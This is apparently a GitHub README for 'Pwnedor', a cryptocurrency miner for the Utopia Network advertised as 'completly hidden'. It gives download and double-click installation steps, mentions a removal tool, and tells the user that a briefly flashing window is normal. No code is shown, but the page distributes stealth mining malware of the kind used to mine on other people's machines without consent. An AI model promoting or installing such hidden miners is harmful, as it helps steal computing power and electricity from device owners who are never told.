Ablencesee123/Hidden-Miner-for-Utopia-Network/README.md

 # Download
 Dowload from Github Pwnedor.exe.
 If you need to delet all compoment of the Pwnedor, Download "killPwnedor.exe" which if launched will erase the hidden miner Pwnedor
-if necessary for extract 7z files use 7Zip can be downloaded at : https://www.7-zip.org/download.html

 # INSTALLATION
 double clic on Pwnedor.exe and its done, you will maybe see a windows for less than 1sec its normal, this software is completly hidden !